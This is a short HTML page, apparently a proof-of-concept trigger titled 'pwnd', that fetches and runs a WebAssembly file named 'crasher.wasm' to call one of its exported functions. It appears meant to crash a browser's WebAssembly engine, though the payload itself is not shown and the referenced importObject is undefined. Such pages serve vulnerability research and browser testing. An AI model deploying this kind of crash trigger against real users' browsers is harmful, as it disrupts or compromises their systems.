14 lines
291 B
HTML
14 lines
291 B
HTML
<!DOCTYPE html>
|
|
<html>
|
|
<head>pwnd</head>
|
|
<body>
|
|
<script>
|
|
fetch("crasher.wasm")
|
|
.then((response) => response.arrayBuffer())
|
|
.then((bytes) => WebAssembly.instantiate(bytes, importObject))
|
|
.then((results) => {
|
|
results.instance.exports.exported_func();
|
|
});
|
|
</script>
|
|
</body>
|
|
</html>
|